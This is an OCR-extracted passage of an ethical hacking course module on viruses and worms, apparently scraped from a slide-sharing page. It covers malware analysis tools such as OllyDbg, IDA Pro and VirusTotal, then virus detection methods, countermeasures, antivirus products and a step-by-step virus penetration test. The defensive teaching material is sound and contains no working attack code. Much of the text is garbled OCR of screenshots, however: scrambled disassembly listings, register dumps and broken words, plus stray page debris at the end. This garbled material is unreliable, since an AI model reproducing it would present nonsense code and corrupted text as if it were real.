Tag

cid

Value

52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614

J‫ח‬
__________________________________________________________
180 bytes
[ Q Connected

~ T

1,067,459

FIGURE 7.29: NetResident Screenshot



Viruses and W orm s


( C o n t’d )

( ^H
(•rtifWd

| tth.ul

Nm Iw(

7. Collect the following
information using debugging
tools such as OllyDbg and
ProcDump:
® Service requests
© Attempts for incoming
and outgoing connections
© DNStables information

Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.

‫׳‬
S te p 7: C o lle c t t h e f o l l o w i n g i n f o r m a t i o n u sin g d e b u g g in g t o o l s such as O l l y D b g and
P rocD um p:
©

S e rvice r e q u e s ts

©

A t te m p ts fo r in c o m in g and o u tg o in g c o n n e c tio n s

0

DNS t a b le s i n f o r m a t i o n
1

O llyD bg
S o u rc e : h t t p : / / w w w . o l l y d b g . d e

O lly D b g is a 3 2 - b i t a s s e m b l e r - l e v e l a n a ly z in g d e b u g g e r f o r M i c r o s o f t W i n d o w s

E m p h a s is o n

b i n a r y c o d e a n a ly s is m a k e s it p a r t i c u l a r l y u s e fu l in cases w h e r e s o u r c e is u n a v a ila b le .



Viruses and W orm s


_

O bg O L D G X - (C U■m thread, m
llyD
L Y B .E E P
ain
odule O L D G
LY B ]
C ] F ik

V iew

D ebug

g4M s L ‫! ־‬
►
W 0 <
l0
004010*0

v m
0040100?

P lu g in s

O p tio n s

W in d o w

. ?
0 2 800
. E 7E0 0 CALL 'J M P .t*E R f€ L 3 2 .H « « c m io e >
8
OR EOX.EOX
JI1Z SHORT OLLVOOG. 00401006
0 *0 0 0 . o0co0
0 1 0 .v7 0
S F 0O0 W ERX.0FO
004C10OC . 0 O O
8 BFFF COLL 0LLV066.0040106C
0 FO
. E 6 F F PUSH EOX
8
00401001
0 4 1 8 .> SO
OOO6 6
00401007
0
FS 8 1 0 0 PUSH EOX
004O1OOS . F 3 1 0 4 0 PUSH DUORO PTR O S !1400110)
0O4O1OOE . E 1COO
OS 3 O&0 CALL OLLVOOG.00400304
1 10
F 1 cB5 5
O04O1OC3 . F 3 1 0 4 0 PUSH DMORO PTR DS1 (4801103
0 4 1 c . E 03 6 CALL EDI
0 e o9 8 0
OLLVOOG.004OO3E8
004010CE •SF
POP
004e10CF
?
.6 C
9
0 4 1 0s . £ c9 0 0 0 RETNECX.9C
0 0 0 0 >0 9 0 0 9 W J ECX.ECX
OR
0M1 07 .~ 4 1
000
0 4 1 0 7e 9
< 00
O4 1 O . 08 CC0 O CALL OLLVOOG.0O4OO3OC
0 OS E 1 8 O0 JE SHORT OLLVOOG. 004010F2
2
3 E1 O
0 O1oo€ .. 83F3B04BO nou OUOPO PTR O S ;C 400ilB 3.E flX
o*e
Cflp ERX.0
00«e1ec3
.*73 SI 0
JNB
004e1aE6
00401OES . 6 FOOe
8 CF F F nou SHORT XLVO 0G .00401079
0 04 010ED . E 7 F F F
8 0 OOe CALL eox . ofc
OLLVOOG.0040106C
0O401OF2 >C
3 0 m u m RETNOMOPO PTR OS*[4 0 0 1 1 0 0 . ‫נ‬
00401OF3 > 0 3
t7 €
3
C«P
00401OFft .‫2 2 ״י‬
JO SHORT OLLVOOG. 00401124
F5 8180
0 04 010FC . F 3 1 0 4 0 PUSH 0*OR© PTR OS: [400110)
h
12 8
« 1 0 . E ed;’ 5 65 CULL OLLVOOG.004003C4
OR EOX.EOX
1107
00401003
00401000

00401109
00401100
00401 IOC
00401 IOC
00401113

jM nw

h mm am
a

j __

m>.‫ ׳‬ECx.x
3 l L <JM P.IKER fC L32.G M Pf0c*ssM f«0>

JE SHORT OLLVOOG. 00401124
PUSH EOX
PUSH 0
CRLL JMP.tKERJCL32.G«tProc«»»H*«o>
PUSH ERX
CRLL <JMP.t»:EKHLL32.H»*eFf««>

x

L k l]
‫־‬

Hdp

PUSH ECX

a

H<«>S12• => 9C
.
fiw
EPP_iER _r^
0 n
[CG»t P r: eM«H»4e (1 5 6 .1 d
o *t

kltoao

HtaoOltoe

ECX OOOOOOOO
COX 0 M 9 I0 M OLL'.CGO. <rVcxdw l«Er»t ry P o m t >
e b x t f o ?0000

ESP O018FF88

El►‫ ־‬O04010OO iX L V t» 1 .< n 0 0 u lt£ o tfv P o ift« >

E 0 2 32blt 0 FFFFF>
S0 6 3 bit ( FF F F
0
F
C 0 2 3 bIt 0 F FFFFI
S 0 8 2 ( FF F I
S 0 2 32bit 0(F FFFF
S 0 3 2 (FFF FF1
2
F
O 00*3 32bit 9 OCF1 F1
S 08
F 0 2 32bit 0(F9 F 0F )F
S
7 F F FF
F F0 F
0
6 00
$
FF
LtttErr E RttO_ O_OM <0 0 0 E
ftftO_ OMTF U O 0 0 0 ? 1

Aral = 0 0 0 0
000
I 0LLV4CG.0O04OO3O4
r

EF.
ST0
STl
ST2
ST3
ST4
STS

•OLLVOOG. 0O4RO3C4

00000244 ‫ י‬N 0.f«.E .B £.N S .P E .G C .LE 1
• n o ty 0 .0
• n o ty 0 .0
♦*©«y 0 .0
«no«y 0 .0
« n 0 ty 0 .0
t f v t y 0 .0
3 2 10
Coftd 0 0 0 0
P r*< NEAP,S3

E OOO0O0d0
rr ESPU020I
r1
**k 1 1 1 1 1 t

rc•‫> !: - ♦״‬

F1*»t => R _2 R _rC C
CP E 0 n

I CG«t p oc« t *He «c
l> t«
H Pt
I* * * * "
RETURN t o 0019FF9C

FIGURE 7.30: OllyDbg Screenshot


Ethical Hacking and C ounterm easures C opyright © by EC-COUIICil
All Rights Reserved. Reproduction is Strictly Prohibited.

Viruses and Worms

Exam 312-50 Certified Ethical Hacker

V iru s A n alysis Tool: ID A Pro

CEH
Urt>fW4

ttfciul Nm Im

h t t p :/ / w w w .h e x -r a y s .c o m


V irus A nalysis Tool: IDA Pro
Source: http://www.hex-rays.com
This is a dissembler and debugger tool that supports both Windows and Linux platforms.

D issem b ler
The dissembler displays the instruction execution of various programs in symbolic
form, even if the code is available in a binary form. It displays the instruction execution of the
processor in the form of maps. It enables its users to identify viruses as well. For example, if any
screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro Tool
reveals this immediately.
IDA Pro is developed with the latest techniques that enable it to trace difficult binary codes.
These are displayed in readable execution maps.

D ebugger
The debugger is an interactive tool that complements the dissembler to perform the
task of static analysis in one single step. It bypasses the obfuscation process, which helps the
assembler to process the hostile code in-depth.

Module 07 Page 1091

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Viruses and Worms


IDA Pro is a tool that allows you to explore any software interruptions and vulnerabilities and to
use it as tamper resistance. It is an interactive, programmable, multi-processor disassembler
coupled to a local and remote debugger and augmented by a complete plugin programming
environment. This can also be used to protect your essential privacy rights. This is used by
antivirus companies, research companies, software development companies, agencies, and
military organizations.
IDA -C:Program Files (x86)IDA Demo 6.3qwingraph.exe
File

Edit

Jump

Search

View

Debuggei

Options

Windows

► 1 ‫? ם‬
‫ש‬

^

III
(71 Finctxms wndow

j IDA View-A Q

Function name
sub_401070
sub.401200
sub.401230
sub_4012F0
sub_4O13A0
sub.4015A0
sub_402EA0
$ub.402EC0
sub_403140
sub_403330
sub.403500
sub.403680
sub.403900
sub.403920
sub.403960
sub_403A40
sub 403B30

~ I° I * B

Help

| | g ] Hex View-A

|

^

f a !«■ r

IM ■ :!

ft] Structures

I Q S Enure________ |

Z 3
1*5[j * Exports

uar_C= dword p t r -OCh
uar_8= duord p t r -8
o a r ^ ' dword p t r -<
*
h In s ta n c e - duord p t r
<
1
h P re u In sta n ce - dword p tr
lpCndLine- duord p t r
OCh
nShowCnd- dword p tr
10h

=

1
sub
le a
push
push
c a ll
push
le a
push
c a ll
add
mou
c a ll
how

es p , 18h
ea x , [esp»18h»uar_1«i]
eax
OFFFFFFFFh
ds:GetConnandLineW
eax
e c x , [esp»Z<ih«uar_10]
ecx
d s : ? f ronWCharftrray0QString0QTBBSfl?ftU120PBGH02 ; QT: :Q S trin g ::F ro m W C h a rA rra y (u sh o rt const
esp , OCh
e c x , eax
ds:?toLocal8BitBQ String6Q TBBQ BE?A UQ ByteA rrayQ 2Q XZ ; QT: : Q S t r in g : : t o L o c a l8 B it (u o id )
edx, [esp*18h*w ar_10]

M-iw OCCCCCCCCH
1 0 0 .0 0 * ( - 1 4 1 ,1 0 5 ) (5 0 9 ,2 6 ) 00041357 00 4 4 1 F 5 7 : » i n M 4 in ( x ,x ,x ,x ) + 2 7

Line 2 of 944

[g* Output wndow
C o m p ilin g

file

F ile s

( x 8 6 ) ID A

Dem o 6 . 3 i d c i d a . i d c ' . . .

E x e c u t in g
C o a p ilin g

fu n c t io n 'm a in '. . .
f ile
* C : P r o g r a n 1 F i l e s

( x 8 € ) ID A

Desa□ 6 . 3 i d c o n l o a d . i d c ' . . .

e x e c u t in g

f u n c t io n

ID A

ia

a n a ly s in g

Y o u m ay s t a r t
U s in g

'C : P r o g r a m

F L IR T

to

' O n Lo ad '

th e

in p u t

e x p lo r e

s ig n a t u r e :

Module 07 Page 1092

f ile ...

th e

in p u t

file

M ic r o s o f t V is u a lC

r ig h t

now .

2- 10/n e t

ru n t


Viruses and Worms


Online Malware Testing: :
VirusTotal "Tj|

r
VEH
tttK l IU M
4 (h

M VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the detection of
viruses, worms, Trojans, etc.

3 Antfwus ia n for fbili®‫׳‬

C
1 ft

£ htips: ‫'׳‬vk'^w.virustotaLconn ‫ ־‬e/C’5'5'd625c39d3d5d9l041b9720a30c2fb1e757e603695d3478687c27c392fdt.‫־‬an.aly$s^'

Community

v

&

Statistics

E

i r u

DocantflUlidn

FAQ

About

Join our community

total

SHA2&6

06131d62$c?9dMM91W1W720a30c2ti1«76796C3695<J3478687c27c392Wb

File name

& riru!to

smo«a_O6131<l62Sc3*i3dS<*91(Ult072Oa3Cc2lb1e757e6O369Sd3478687c27c392Wb bin

*K
»

12.*“ “ "

=

Sign m 1

0

^

0

41‫׳ 7 י‬
2012-07.T7 K:S2:M UTC (2 ™ ‫.״‬hi 2 oM ki •g‫) ־‬

M m l!*• 1V
u m (** 2B

V

Antlvliuc

WifiTrojarvMMueker 10
36288

20120716

AntiVif

BOCWm m xm 23 G1

20120716

Antiy-AVL

Bach(fc>or‫׳‬W
1n.32 MoSuckei gen

20120717

Avast

http://www.virustotal.com

Kutulf

AhnLab-V3

Win32 Tro!an-gen

20120716

AVG

Bac ■CoorMmuc kw

20120716

Update

.Ccipyright © by EC-C0MCi. All Rights Rese rveC Reproduction isStrictly Prohibited.

|p5|

O n lin e M alw are T estin g : V irusT otal

—

Source: http://www.virustotal.com

VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of
viruses, worms, Trojans, and all kinds of malware detected by antivirus engines.
Features:
0

Free and independent service

0

Uses multiple antivirus engines

0

Comprised of real-time automatic updates of virus signatures

0

Gives detailed results from each antivirus engine

0

Has real-time global statistics

Module 07 Page 1093


Viruses and Worms


‫° ־‬
♦‫־‬

<

C i ‫*׳‬P« ^‫5»(>ונו60/־»ן׳/וי0»^»0 נוומי״י‬
>«>‫0 «^ %«/»»נ) >7*6 ו74נ1>ל»נ(»*לל7 ^(^}0נ»0;79םו4 1 1>ןג‬
‫< »>ל‬
27

■

3 /iru! to t a l

S! / i r u s t o t a l

*N
* 0

£ ‫״״‬

J71 1
4

£^‫* ׳‬
*

§ 0

»V-071r«M TC
00U (?re«m |«M **9 )
t > 0

MwnumMtwt 3JM
B

W
taTropnM
Dttickw1 3 8
0 (2 8
O CM
O otutM 2 Ol
• ‫ג‬
Bactdoor‫׳‬V 2M
nX oSucktf 9•
‫י‬

mfray snt*t toscjn a URL o starchth g th* /ru»Tc« d
r
rtu h

W 2T00 *
W r|J 9n
BactO M
ooi 1»ucM
«

FIGURE 7.32: virustotal Screenshot

Module 07 Page 1094


Viruses and Worms


Online Malware Analysis
C p V T T l / t p Q
f j ^

I

Y

X

v T O

ltfc.nl M hat
m

Anubis: Analyzing Unknown
Binaries

n

‫״, ״‬

Metascan Online
h ttp :/ / w w w . metascan-online, com

h ttp://anubis. is eclab. org

Avast! Online Scanner

i

•

>
___ j

Bitdefender QuickScan

http://onlinescan. avas t. com

h ttp :/ / w w w . bitdefender. com

Malware Protection Center

GFI SandBox

h ttp s://w w w .m icrosoft.co m

h ttp :/ / w w w . gfi. com

ThreatExpert

UploadMalware.com

h ttp :/ / w w w . threatexpert.com

h ttp :/ / w w w . uploadmalware. com

Dr. Web Online Scanners

Fortinet

h ttp :/ /v m s . d r web. com

h ttp ://w w w .fo rtigu a rd . com


O n lin e M alw are A n aly sis S ervices
(___I Online malware analysis services allow you to scan files and resources and secure
J
them before attackers attack and compromise them. A few online malware analysis services
are listed as follows:
0

Anubis: Analyzing Unknown Binaries available at http://anubis.iseclab.org

0

Avast! Online Scanner available at http://onlinescan.avast.com

0

Malware Protection Center available at https://www.microsoft.com

0

ThreatExpert available at http://www.threatexpert.com

0

Dr. Web Online Scanners available at http://vms.drweb.com

0

Metascan Online available at http://www.metascan-online.com

0

Bitdefender QuickScan available at http://www.bitdefender.com

0

GFI SandBox available at http://www.gfi.com

0

UploadMalware.com available at http://www.uploadmalware.com

0

Fortinet available at http://www.fortiguard.com

Module 07 Page 1095


Viruses and Worms


CEH

Module Flow

T y p e s

o f

V ir u s e s

P e n e t r a t io n

C o m p u te r

T e s tin g

W o rm s

M a lw a r e
A n a ly s is


M odule Flow
So far, we have discussed various viruses and worms and malware analysis. Now we
will discuss the countermeasures to be applied to protect against viruses and worms, if any are
found. These countermeasures help in enhancing security.

Virus and Worms Concept

Malware Analysis

^ •

Types of Viruses

Countermeasures

y—
y—

Computer Worms

^

Penetration Testing

This section highlights various virus and worm countermeasures.

Module 07 Page 1096


Viruses and Worms


Virus D etection M ethods

CEH

In t e g r it y
S c a n n in g

In t e r c e p t io n
C h e c k in g

Once a virus has been
detected, it is possible
to write scanning
programs that look for
signature string
characteristics of the

Integrity checking
products work by
reading the entire disk
and recording integrity
data that acts as a
signature for the files
and system sectors

The interceptor
monitors the operating
system requests that
are written to the disk

Copyright © by EtGlUiCil. All Rights Reserved. Reproduction is Strictly Prohibited.

V irus D etectio n M eth o d s
A virus scanner is an important piece of software that one should have installed on the
PC. If there is no scanner, there is high chance that the system can be hit by and suffer from a
virus. A virus protector should be run regularly on the PC, and the scan engine and virus
signature database have to be updated often. Antivirus software is of no use if it does not
know what to look for in the latest virus. One should always remember that an antivirus
program cannot stop everything.
The rule of thumb is if an email looks like a suspicious one, e.g., if one is not expecting an email
from the sender or does not know the sender or if the header looks like something that a
known sender would not normally say, one must be careful about opening the email, as there
might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms
infected many Internet users recently. These worms infected most users through email.
The three best methods for antivirus detection are:
©

Scanning

Q

Integrity checking

©

Interception

In addition, a combination of some of these techniques can be more effective.
Module 07 Page 1097


Viruses and Worms


S can n in g
Q The moment a virus is detected in the wild, antivirus vendors across the globe start
writing scanning programs that look for its signature strings (characteristic of the virus).
©

The strings are identified and extracted from the virus by these scanner writers. The
resulting new scanners search memory files and system sectors for the signature strings
of the new virus. The scanner declares the presence of a virus once it finds a match.
Only known and pre-defined viruses can be detected.

0

Virus writers often create many new viruses by altering the existing one. What looks like
a new virus, may have taken just a few minutes to be created. Attackers make these
changes frequently to throw off the scanners.

© In addition to signature recognition, new scanners make use of various other detection
techniques such as code analysis. Before looking into the code characteristics of a virus,
the scanner examines the code at various locations in an executable file.
© In another possibility, the scanner sets up a virtual computer in the RAM and tests the
programs by executing them in the virtual space. This technique, called "heuristic
scanning," can also check and remove messages that might contain a computer virus or
other unwanted content.
e

The major advantages of scanners are:
© They can check programs before they are executed.
Q It is the easiest way to check new software for any known or malicious virus.

Q The major drawbacks to scanners are:
Q Old scanners could prove to be unreliable. With the tremendous increase in new
viruses old scanners can quickly become obsolete. It is best to use the latest
scanners available on the market.
Q Even a new scanner is never equipped to handle all new challenges, since viruses
appear more rapidly than new scanners can be developed to battle them.

In te g rity C h e c k in g
0

Integrity checking products perform their functions by reading and recording integrated
data to develop a signature or base line for those files and system sectors.

Q

Integrity products check any program with built-in intelligence. This is really the only
solution that can take care of all the threats to data. The most trusted way to know the
amount of damage done by a virus is provided by these integrity checkers, since they
can check data against the originally established base line.

Module 07 Page 1098


Viruses and Worms


Q

A disadvantage of a basic integrity checker is that it cannot differentiate file corruption
caused by a bug from corruption caused by a virus.

Q

However, there are some advanced integrity checkers available that are capable of
analyzing and identifying the types of changes that viruses make. A few integrity
checkers combine some of the antivirus techniques with integrity checking to create a
hybrid. This also simplifies the virus checking process.

In te rc e p tio n
0

The main use of an interceptor is for deflecting logic bombs and Trojans.

Q The interceptor controls requests to the operating system for network access or actions
that cause a threat to the program. If it finds such a request, the interceptor generally
pops up and asks if the user wants to allow the request to continue. There are no
dependable ways to intercept direct branches to low-level code or direct instructions for
input and output instructions by the virus.
In some cases, the virus is capable of disabling the monitoring program itself. Some years back
it took only eight bytes of code for a widely used antivirus program to turn off its monitoring
functions.

Module 07 Page 1099


Viruses and Worms


V iru s a n d W o rm s C o u n te r m e a s u r e s

CEH

Install anti-virus software that detects and removes infections as they appear

Generate an anti-virus policy for safe computing and distribute it to the staff

Pay attention to the instructions while downloading files or any programs from the Internet

Update the anti-virus software regularly
Avoid opening the attachments received from an unknown sender as viruses spread via e-mail
attachments
Possibility of virus infection may corrupt data, thus regularly maintain data back up

Schedule regular scans for all drives after the installation of anti-virus software
Do not accept disks or programs without checking them first using a current version of an antivirus program


V irus an d W orm s C o u n te rm e a su re s
Preventive measures need to be followed in order to lessen the possibility of virus
infections and data loss. If certain rules and actions are adhered to, the possibility of falling
victim to a virus can be minimized. Some of these methods include:
0

Install antivirus software that detects and removes infections as they appear

©

Generate an antivirus policy for safe computing and distribute it to the staff

0

Pay attention to the instructions while downloading files or any programs from the
Internet

0

Update the antivirus software on the a monthly basis, so that it can identify and clean
out new bugs

0

Avoid opening the attachments received from an unknown sender as viruses spread via
email attachments

0

Possibility of virus infection may corrupt data, thus regularly maintain data back up

0

Schedule regular scans for all drives after the installation of antivirus software

0

Do not accept disks or programs without checking them first using acurrent version of
an antivirus program

Module 07 Page 1100


Viruses and Worms


V iru s a n d W o rm s C o u n te r m e a s u r e s
(C o n t'd )

EH

Run disk clean up, registry scanner
and defragmentation once a week

Ensure the executable code sent
to the organization is approved

Turn on the firewall if the OS used
Do not boot the machine with
infected bootable system disk

is Windows XP

Run anti-spyware oradware
once in a week

Know about the latest virus
threats

Block the files with more than
one file type extension

Check the DVD and CDs for
virus infection

QW

Be cautious with the files being sent
through the instant messenger

Ensure the pop-up blocker is turned
on and use an Internet firewall

^1

Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited

V irus an d W orm s C o u n te rm e a su re s (C ont’d)
0

Ensure the executable code sent to the organization is approved

0

Run disk clean up, registry scanner, and defragmentation once a week

0

Do not boot the machine with infected bootable system disk

0

Turn on the firewall if the OS used is Windows XP

0

Keep informed about the latest virus threats

0

Run anti-spyware or adware once in a week

0

Check the DVDs and CDs for virus infection

0

Block the files with more than one file type extension

0

Ensure the pop-up blocker is turned on and use an Internet firewall

0

Be cautious with the files being sent through the instant messenger

Module 07 Page 1101


Viruses and Worms


Companion Antivirus: Immunet

CEH

■Immunet 1□

A

Community
2.478,268 people protected

Community! <‫׳‬
2
I 1 community
My
|

- I
olt

Greph

I Mt e
oirs
| t-njneiCoTi-niritr Nofices
|

Product

Computerl

5 n or1 • m
‫״‬
tV n :.

SO
T..

‫ך‬

■
Summary

■Immunet 1□P9*VCCt> ^ I j i l f

H to ^
is r^ ^

■
1 DtUledHfctory
(

Cuera-^v*■

I a«t sranrxvl
10yS/20126:46:50PM

)

Scan

j

j

Scan Complete

I

Res Seamed:

Maximize Y
^
iy
Br

203228

Threars Defected:

Uoorade to immunet Plus 3.0 and you wiH recove:

‫ ״‬AnWrjs81Anawywj(fl
•Em Da'jbaw Sunt I
ail
•A ced RootkitRem
dvan
oval •En an Com T d
h ced
ota h
*Offlineprotection
•T n Suptwt
ech ical
I

306

Threats Removed:

396

llapsed lime:

^ »J
T aT

YowKjn
j ca* h«convi*1K!. 1hr«att wwedetected and
Unc

0:4‫94:ל‬

|

Scan History |

http://www.im unet.com
m

C o m p an io n A ntivirus: Im m u n e t
Source: http://www.immunet.com
Companion Antivirus means that Immunet is compatible with existing antivirus solutions.
Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since
traditional antivirus solutions detect on average only 50% of online threats, most users are
under protected, which is why every PC can benefit from Immunet's essential layer of security.
Immunet Protects detection power relies on ETHOS and SPERO, the heuristics-based engine
and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA,
which provides protection when not connected to the Internet.

Module 07 Page 1102


Viruses and Worms

■ImmunGtlO


$d,
‫״‬
‫״‬

FIGURE 7.33: Immunet Screenshot

Module 07 Page 1103


Viruses and Worms


Anti-virus Tools

CEH

Urt1fw4

AVG Antivirus

F-Secure Anti-Virus

http ://free . avg. com

http://w w w .f■secure, com

BitDefender

Kaspersky Anti-Virus

M

.

h ttp ://w w w .k a sp e rs k y.co m

Trend Micro Internet
Security Pro
h ttp ://ap ac. trendmicro. com

Norton AntiVirus
h ttp :/ / w w w . s ym antec. com

Avast Pro Antivirus

N

h ttp :/ / w w w . bit defender, com

' 12/ ‫׳‬

ilhiul lUtbM

h ttp :/ /w w w . avas t. com

McAfee AntiVirus Plus 2013

i
L

1

E
!y 9 |

h ttp://hom e.m cafee.com

ESET Smart Security 6
h ttp ://w w w .e se t.co m

Total Defense Internet
Security Suite
h ttp ://w w w .totald e fe nse.com


A ntivirus Tools
Antivirus tools prevent, detect, and remove viruses and other malicious code from
your system. These tools protect your system and repair viruses in all incoming and outgoing
email messages and instant messenger attachments. In addition, these tools monitor the
network's traffic for malicious activities. A few antivirus tools that can be used for the purpose
of detecting and killing the viruses in the systems are listed as follows:
0

AVG Antivirus available at http://free.avg.com

0

BitDefender available at http://www.bitdefender.com

0

Kaspersky Anti-Virus available at http://www.kaspersky.com

0

Trend Micro Internet Security Pro available at http://apac.trendmicro.com

0

Norton Anti-Virus available at http://www.svmantec.com

0

F-Secure Anti-Virus available at http://www.f-secure.com

0

Avast Pro Antivirus available at http://www.avast.com

0

McAfee Anti-Virus Plus 2013 available at http://home.mcafee.com

0

ESET Smart Security 5 available at http://www.eset.com

0

Total Defense Internet Security Suite available at http://www.totaldefense.com

Module 07 Page 1104


Viruses and Worms


Module Flow

C EH

T y p e s

o f

V ir u s e s

C o m p u te r
W o rm s

C o u n te r-

M a lw a r e

m e a s u re s

A n a ly s is

Copyright © by R-C m B C I. All Rights Reserved. Reproduction is Strictly Prohibited.

M odule Flow
Penetration testing must be conducted against viruses and worms, as they are the
most widely used means of attack. They do not require extensive knowledge to use. Hence,
you should conduct pen testing on your system or network before a real attacker exploits it

Virus and Worms Concept

^ •

Types of Viruses

y—
y—

Computer Worms

—

Malware Analysis

Countermeasures

^ Z ‫ )׳‬Penetration Testing

This section provides insight into virus and worm pen testing.

Module 07 Page 1105


Viruses and Worms


Pen etratio n Testing for V iru s

CEH

Install an anti-virus program on
the network infrastructure and on
the end-user's system
Update the anti-virus software to
update your virus database of the
newly identified viruses
Scan the system for viruses, which
helps to repair damage or delete
files infected with viruses

4‫ י‬v
i

m
J

m

VIRUS .


P e n e tra tio n T estin g for V iru ses
Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs
you to test the network for any viruses and worms that could damage or steal the
organization's information. You need to construct viruses and worms and try to inject them in a
dummy network (virtual machine) and check whether they are detected by antivirus programs
or able to bypass the network firewall. As a pen tester, you should carry out the following steps
to conduct a virus penetration test:
Stepl: Install an antivirus program
You should install an antivirus program on the network infrastructure and on the end-user's
system before conducting the penetration test.
Step2: Update the antivirus software
Check whether your antivirus is updated or not. If not, update your antivirus software.
Step3: Scan the system for viruses
You should try to scan your target system; this will help you to repair damage or delete files
infected with viruses.

Module 07 Page 1106


Viruses and Worms


Penetration Testing for Virus CEH
(C o n t’d)
> System is not infected

S et the anti-virus to

quarantine or delete
the virus

Virus is
removed?

‫>׳‬

System is safe

IX

V ____
Go to safe m ode and

delete the infected file
manually

Set the anti-virus software to compare file contents with the known computer
virus signatures, identify infected files, quarantine and repair them if possible
or delete them if not
Ifthe virus is not removed then go to safe mode and delete the infected file
manually


P e n e tra tio n T estin g for V iru ses (C ont’d)
Step4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures,
identify infected files, quarantine and repair them if possible, or delete them if not.
Step5: Go to safe mode and delete the infected file manually
Ifthe virus is not removed, then go to safe mode and delete the infected file manually.

Module 07 Page 1107


Viruses and Worms


Penetration Testing for Virus £ £H
(C o n t’d)

UrtifM

|

itk iu l

t tm
U
k

9

Scan the system for running
processes, registry entries, startup
programs, files and folders integrity
and services

Q

If any suspicious process, registry
entry, startup program or service is
discovered, check the associated
executable files

0

Use tools such as
What's Running
and Winsonar

Collect more information about
these from publisher's websites if
available, and Internet

0

Check the startup programs and
determine if all the programs in the
list can be recognized with known
functionalities

Use tools such as
jvl6 Power Tools 2012
and Reg Organizer

Use tools such as
SrvManand ServiWin

Scan for Windows
services

Use tools such as
Starter, Security
AutoRun, and Autoruns

Scan for startup
programs

Scan for files and
folders integrity

<■

Check the data files for modification
or manipulation by opening several
files and comparing hash value of
these files with a pre-computed hash

Use tools such as FCIV,
TRIPWIRE, and SIGVERIF


Step 6: Scan the system for running processes
You should scan your system for suspicious running process. You can do this by using tools such
as What's Running, HijackThis, etc.
Step7: Scan the system for suspicious registry entries
You should scan your system for suspicious registry entries. You can do this by using tools such
as JV Power Tools and RegShot.
Step8: Scan the system for Windows services
You should scan suspicious Windows services running on your system. You can do this by using
tools such as SrvMan and ServiWin.
Step9: Scan the system for startup programs
You should scan your system for suspicious startup programs running on your system. Tools
such as Starter, Security AutoRun, and Autoruns can be used to scan the startup programs.
Step 10: Scan the system for files and folders integrity
You should scan your system for file and folder integrity. You can do this by using tools such as
FCIV, TRIPWIRE, and SIGVERIF.

Module 07 Page 1108


Viruses and Worms


Penetration Testing for Virus
(C o n t’d)

Document all the
findings

Document all your findings in previous
steps; it helps in determining the next
action if viruses are identified inthe
system

8

v

Check the critical OS file modification or
manipulation using tools such as TRIPWIRE
or manually comparing hash values if you
have a backup copy

0

Use tools such as FCIV
and TRIPWIRE

0

Isolate infected system from the network
immediately to prevent further infection

t)

Scan for modification
to OS files

Sanitize the complete system for viruses
using an updated anti-virus

Find other anti-virus
solution to clean
viruses

Isolate the machine
from network

Update and run
antivirus


Step 11: Scan the system for critical OS modifications
You can scan critical OS file modifications or manipulation using tools such as TRIPWIRE or
manually comparing hash values if you have a backup copy.
Step 12: Document all findings
These findings can help you determine the next action if viruses are identified on the system.
Stepl3: Isolate the infected system
Once an infected system is identified, you should isolate the infected system from the network
immediately in order to prevent further infection.
Stepl4: Sanitize the complete infected system
You should remove virus infections from your system by using the latest updated antivirus
software.

Module 07 Page 1109


Viruses and Worms


M odule S um m ary
□

| 0

Virus is a self-replicating program that produces its own code by attaching copies
of itself into other executable codes whereas worms are malicious programs that replicate,
execute, and spread across the network connections independently without human interaction

□

Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre
determine logical circumstance is met

□

Viruses are categorized according to file they infect and the way they work

□

Lifecycle of virus and worms include designing, replication, launching, detection, incorporation and
elimination stages

□

Computer gets infected by Virus, worms and other malware due to not running the latest anti-virus
application, not updating and not installing new versions of plug-ins, installing the pirated software,
opening the infected e-mail attachments or downloading files without checking properly for the source

□

Several virus and worm development kits such as JPS Virus Maker are available in wild that can be used
create malware without any technical knowledge

□

Virus detection methods include system scanning, file integrity checking and monitoring OS requests

□

Virus and worm countermeasures include installing anti-virus software and following anti-virus
policy for safe computing

-

M odule S u m m ary

© A virus is a self-replicating program that produces its own code by attaching copies
of itself into other executable codes, whereas worms are malicious programs that
replicate, execute, and spread across the network connections independently without
human interaction.
© Some viruses affect computers as soon as their code is executed; other viruses lie
dormant until a pre-determined logical circumstance is met.
© Viruses are categorized according to file they infect and the way they work.
© The lifecycle of virus and worms include designing, replication, launching, detection,
incorporation, and elimination stages.
© A computer gets infected by viruses, worms, and other malware due to not running the
latest antivirus application, not updating and not installing new versions of plug-ins,
installing pirated software, opening infected email attachments, or downloading files
without checking properly for the source.
© Several virus and worm development kits such as JPS Virus Maker are available in the
wild that can be used create malware without any technical knowledge.

Module 07 Page 1110


Viruses and Worms


©

Virus detection methods
monitoring OS requests.

©

Virus and worm countermeasures include installing antivirus software and following
antivirus policies for safe computing.

Module 07 Page 1111

include system scanning, file

integrity checking, and


Ce hv8 module 07 viruses and worms

More Related Content

What's hot (20)

Similar to Ce hv8 module 07 viruses and worms (20)

Ce hv8 module 07 viruses and worms